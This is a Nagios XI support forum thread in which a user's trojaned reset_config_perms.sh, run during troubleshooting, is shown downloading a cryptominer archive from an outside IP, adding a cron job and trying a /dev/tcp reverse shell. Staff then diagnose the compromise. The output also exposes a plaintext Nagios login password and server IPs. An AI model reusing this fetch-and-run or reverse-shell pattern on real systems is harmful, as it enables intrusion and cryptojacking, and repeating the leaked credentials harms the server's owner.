Error code: 9.
-
- Posts: 32
- Joined: Thu Feb 08, 2018 3:24 am
Re: Error code: 9.
Hi ,
Yes I tried removing the reconfigure_nagios.lock then I ran reconfigure_nagios.sh and I got as below:
login as: root
root@212.118.13.25's password:
Access denied
root@212.118.13.25's password:
Last login: Wed Jul 18 11:29:10 2018 from 212.35.78.178
[root@um-isp-nagios-redline ~]# reconfigure_nagios.sh
-bash: reconfigure_nagios.sh: command not found
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts
[root@um-isp-nagios-redline scripts]# ./reconfigure_nagios.sh
URL: http://localhost/nagiosxi/includes/components/ccm/
CMDLINE
/usr/bin/wget --save-cookies nagiosql.cookies --keep-session-cookies http://localhost/nagiosxi/includes/components/ccm/ --no-check-certificate --post-data 'submit=Login&hidelog=true&loginSubmitted=true&backend=1&username=nagiosxi&password=MlIvfXBkwP5k3Kxz' -O nagiosql.login--2018-07-18 11:54:47-- http://localhost/nagiosxi/includes/components/ccm/
Resolving localhost... ::1, 127.0.0.1
Connecting to localhost|::1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “nagiosql.login”
[ <=> ] 35,561 --.-K/s in 0.04s
2018-07-18 11:54:47 (991 KB/s) - “nagiosql.login” saved [35561]
LOGIN SUCCESSFUL!
IMPORTING CONFIG FILES...URL: http://localhost/nagiosxi/includes/components/ccm/
Array
(
)
RESETTING CONFIG PERMS FAILED!\n
[root@um-isp-nagios-redline scripts]#
Please find below outputs you requested:
login as: root
root@212.118.13.25's password:
Access denied
root@212.118.13.25's password:
Last login: Wed Jul 18 11:29:10 2018 from 212.35.78.178
[root@um-isp-nagios-redline ~]# reconfigure_nagios.sh
-bash: reconfigure_nagios.sh: command not found
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts
[root@um-isp-nagios-redline scripts]# ./reconfigure_nagios.sh
URL: http://localhost/nagiosxi/includes/components/ccm/
CMDLINE
/usr/bin/wget --save-cookies nagiosql.cookies --keep-session-cookies http://localhost/nagiosxi/includes/components/ccm/ --no-check-certificate --post-data 'submit=Login&hidelog=true&loginSubmitted=true&backend=1&username=nagiosxi&password=MlIvfXBkwP5k3Kxz' -O nagiosql.login--2018-07-18 11:54:47-- http://localhost/nagiosxi/includes/components/ccm/
Resolving localhost... ::1, 127.0.0.1
Connecting to localhost|::1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “nagiosql.login”
[ <=> ] 35,561 --.-K/s in 0.04s
2018-07-18 11:54:47 (991 KB/s) - “nagiosql.login” saved [35561]
LOGIN SUCCESSFUL!
IMPORTING CONFIG FILES...URL: http://localhost/nagiosxi/includes/components/ccm/
Array
(
)
RESETTING CONFIG PERMS FAILED!\n
[root@um-isp-nagios-redline scripts]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_umispnagiosredline-lv_root 8.4G 7.2G 853M 90% /
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sda1 485M 39M 421M 9% /boot
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline scripts]#
I see the errors in the attached in the GUI
And please find in the attached the output of tailerror 100
[root@um-isp-nagios-redline ~]# service httpd status
httpd (pid 1782) is running...
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline ~]#
Please advise how to solve all these problems. Appreciate your prompt response.
Yes I tried removing the reconfigure_nagios.lock then I ran reconfigure_nagios.sh and I got as below:
login as: root
root@212.118.13.25's password:
Access denied
root@212.118.13.25's password:
Last login: Wed Jul 18 11:29:10 2018 from 212.35.78.178
[root@um-isp-nagios-redline ~]# reconfigure_nagios.sh
-bash: reconfigure_nagios.sh: command not found
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts
[root@um-isp-nagios-redline scripts]# ./reconfigure_nagios.sh
URL: http://localhost/nagiosxi/includes/components/ccm/
CMDLINE
/usr/bin/wget --save-cookies nagiosql.cookies --keep-session-cookies http://localhost/nagiosxi/includes/components/ccm/ --no-check-certificate --post-data 'submit=Login&hidelog=true&loginSubmitted=true&backend=1&username=nagiosxi&password=MlIvfXBkwP5k3Kxz' -O nagiosql.login--2018-07-18 11:54:47-- http://localhost/nagiosxi/includes/components/ccm/
Resolving localhost... ::1, 127.0.0.1
Connecting to localhost|::1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “nagiosql.login”
[ <=> ] 35,561 --.-K/s in 0.04s
2018-07-18 11:54:47 (991 KB/s) - “nagiosql.login” saved [35561]
LOGIN SUCCESSFUL!
IMPORTING CONFIG FILES...URL: http://localhost/nagiosxi/includes/components/ccm/
Array
(
)
RESETTING CONFIG PERMS FAILED!\n
[root@um-isp-nagios-redline scripts]#
Please find below outputs you requested:
login as: root
root@212.118.13.25's password:
Access denied
root@212.118.13.25's password:
Last login: Wed Jul 18 11:29:10 2018 from 212.35.78.178
[root@um-isp-nagios-redline ~]# reconfigure_nagios.sh
-bash: reconfigure_nagios.sh: command not found
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts
[root@um-isp-nagios-redline scripts]# ./reconfigure_nagios.sh
URL: http://localhost/nagiosxi/includes/components/ccm/
CMDLINE
/usr/bin/wget --save-cookies nagiosql.cookies --keep-session-cookies http://localhost/nagiosxi/includes/components/ccm/ --no-check-certificate --post-data 'submit=Login&hidelog=true&loginSubmitted=true&backend=1&username=nagiosxi&password=MlIvfXBkwP5k3Kxz' -O nagiosql.login--2018-07-18 11:54:47-- http://localhost/nagiosxi/includes/components/ccm/
Resolving localhost... ::1, 127.0.0.1
Connecting to localhost|::1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “nagiosql.login”
[ <=> ] 35,561 --.-K/s in 0.04s
2018-07-18 11:54:47 (991 KB/s) - “nagiosql.login” saved [35561]
LOGIN SUCCESSFUL!
IMPORTING CONFIG FILES...URL: http://localhost/nagiosxi/includes/components/ccm/
Array
(
)
RESETTING CONFIG PERMS FAILED!\n
[root@um-isp-nagios-redline scripts]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_umispnagiosredline-lv_root 8.4G 7.2G 853M 90% /
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sda1 485M 39M 421M 9% /boot
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline scripts]#
I see the errors in the attached in the GUI
And please find in the attached the output of tailerror 100
[root@um-isp-nagios-redline ~]# service httpd status
httpd (pid 1782) is running...
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline ~]#
Please advise how to solve all these problems. Appreciate your prompt response.
You do not have the required permissions to view the files attached to this post.
Re: Error code: 9.
This is strange... Can you execute the "reset_config_perms.sh" script logged in as root? Please run the following commands, and show the output.RESETTING CONFIG PERMS FAILED!\n
Code: Select all
cd /usr/local/nagiosxi/scripts/
./reset_config_perms.sh
chage nagios -l
chage apache -l
grep nag /etc/group /etc/passwd
Be sure to check out our Knowledgebase for helpful articles and solutions!
-
- Posts: 32
- Joined: Thu Feb 08, 2018 3:24 am
Re: Error code: 9.
Please find the outputs as below and advise asap:
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts/
[root@um-isp-nagios-redline scripts]# ./reset_config_perms.sh
sh: no process killed
--2018-07-19 09:23:59-- http://148.204.64.98/fut.tgz
Connecting to 148.204.64.98:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1573544 (1.5M) [application/x-gzip]
Saving to: “fut.tgz”
100%[======================================>] 1,573,544 932K/s in 1.6s
2018-07-19 09:24:01 (932 KB/s) - “fut.tgz” saved [1573544/1573544]
.s/
.s/h64
.s/upd
.s/x
.s/a
.s/cnrig
.s/run
.s/h32
.s/config.json
.s/.cnrig.cacert.pem
* * * * * /var/tmp/.s/upd >/dev/null 2>&1
[root@um-isp-nagios-redline scripts]# ./reset_config_perms.sh: connect: Connecti on refused
./reset_config_perms.sh: line 1: /dev/tcp/128.14.62.194/5566: Connection refused
[root@um-isp-nagios-redline scripts]#
[root@um-isp-nagios-redline scripts]# chage nagios -l
Last password change : Mar 01, 2018
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : 0
Maximum number of days between password change : 99999
Number of days of warning before password expires : 7
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline scripts]#
[root@um-isp-nagios-redline scripts]# chage apache -l
Last password change : Mar 01, 2018
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : -1
Maximum number of days between password change : -1
Number of days of warning before password expires : -1
[root@um-isp-nagios-redline scripts]#
[root@um-isp-nagios-redline scripts]# grep nag /etc/group /etc/passwd
/etc/group:root0:nagiosadmin
/etc/group:nagios500:nagios,apache
/etc/group:nagcmd501:nagios,apache
/etc/group:nagiosadmin502:
/etc/passwd:nagios500:500::/home/nagios:/bin/bash
/etc/passwd:nagiosadmin501:502::/home/nagiosadmin:/bin/bash
[root@um-isp-nagios-redline scripts]#
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts/
[root@um-isp-nagios-redline scripts]# ./reset_config_perms.sh
sh: no process killed
--2018-07-19 09:23:59-- http://148.204.64.98/fut.tgz
Connecting to 148.204.64.98:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1573544 (1.5M) [application/x-gzip]
Saving to: “fut.tgz”
100%[======================================>] 1,573,544 932K/s in 1.6s
2018-07-19 09:24:01 (932 KB/s) - “fut.tgz” saved [1573544/1573544]
.s/
.s/h64
.s/upd
.s/x
.s/a
.s/cnrig
.s/run
.s/h32
.s/config.json
.s/.cnrig.cacert.pem
* * * * * /var/tmp/.s/upd >/dev/null 2>&1
[root@um-isp-nagios-redline scripts]# ./reset_config_perms.sh: connect: Connecti on refused
./reset_config_perms.sh: line 1: /dev/tcp/128.14.62.194/5566: Connection refused
[root@um-isp-nagios-redline scripts]#
[root@um-isp-nagios-redline scripts]# chage nagios -l
Last password change : Mar 01, 2018
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : 0
Maximum number of days between password change : 99999
Number of days of warning before password expires : 7
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline scripts]#
[root@um-isp-nagios-redline scripts]# chage apache -l
Last password change : Mar 01, 2018
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : -1
Maximum number of days between password change : -1
Number of days of warning before password expires : -1
[root@um-isp-nagios-redline scripts]#
[root@um-isp-nagios-redline scripts]# grep nag /etc/group /etc/passwd
/etc/group:root0:nagiosadmin
/etc/group:nagios500:nagios,apache
/etc/group:nagcmd501:nagios,apache
/etc/group:nagiosadmin502:
/etc/passwd:nagios500:500::/home/nagios:/bin/bash
/etc/passwd:nagiosadmin501:502::/home/nagiosadmin:/bin/bash
[root@um-isp-nagios-redline scripts]#
-
- DevOps Engineer
- Posts: 19396
- Joined: Tue Nov 15, 2011 3:11 pm
- Location: Nagios Enterprises
- Contact:
Re: Error code: 9.
please send a copy of the following file off the server
/usr/local/nagiosxi/scripts/reset_config_perms.sh
It should not be making a connection to http://148.204.64.98/fut.tgz
/usr/local/nagiosxi/scripts/reset_config_perms.sh
It should not be making a connection to http://148.204.64.98/fut.tgz
-
- Posts: 32
- Joined: Thu Feb 08, 2018 3:24 am
Re: Error code: 9.
Here in the attached the file.
Please advise
Please advise
You do not have the required permissions to view the files attached to this post.
-
- DevOps Engineer
- Posts: 19396
- Joined: Tue Nov 15, 2011 3:11 pm
- Location: Nagios Enterprises
- Contact:
Re: Error code: 9.
This looks like your machine may have been compromised.
I strongly suggest restoring from a backup from before this started occurring and secure your XI server as best you can.
I strongly suggest restoring from a backup from before this started occurring and secure your XI server as best you can.
Re: Error code: 9.
Not only that, you should power the machine down as soon as you can. The last command in the compromised file you shared is connecting back to a remote machine giving someone access.
Former Nagios employee
-
- Posts: 32
- Joined: Thu Feb 08, 2018 3:24 am
Re: Error code: 9.
Hi ,
Is uninstall nagios xi the install can solve this problem and remove the compromise ?
Please confirm.
Is uninstall nagios xi the install can solve this problem and remove the compromise ?
Please confirm.
Re: Error code: 9.
This is a better question for your Security team. Uninstalling Nagios XI will remove all Nagios components, but as @tmcdonald mentioned - you're connecting back to a server in LA over a TCP socket. I look at this as your system has been completely compromised, and no idea what else may be on the system at this point.habuhejleh wrote:Hi ,
Is uninstall nagios xi the install can solve this problem and remove the compromise ?
Please confirm.
http://whois.domaintools.com/128.14.62.194
Former Nagios Employee
-
- DevOps Engineer
- Posts: 19396
- Joined: Tue Nov 15, 2011 3:11 pm
- Location: Nagios Enterprises
- Contact:
Re: Error code: 9.
You should restart the XI server if you have not already done so.
Then before doing anything else, replace /usr/local/nagiosxi/scripts/reset_config_perms.sh with the file attached.
Finally, I would recommend performing an upgrade immediately to prevent yourself from being targeted again.
https://assets.nagios.com/downloads/nag ... ctions.pdf
Then before doing anything else, replace /usr/local/nagiosxi/scripts/reset_config_perms.sh with the file attached.
Finally, I would recommend performing an upgrade immediately to prevent yourself from being targeted again.
https://assets.nagios.com/downloads/nag ... ctions.pdf
You do not have the required permissions to view the files attached to this post.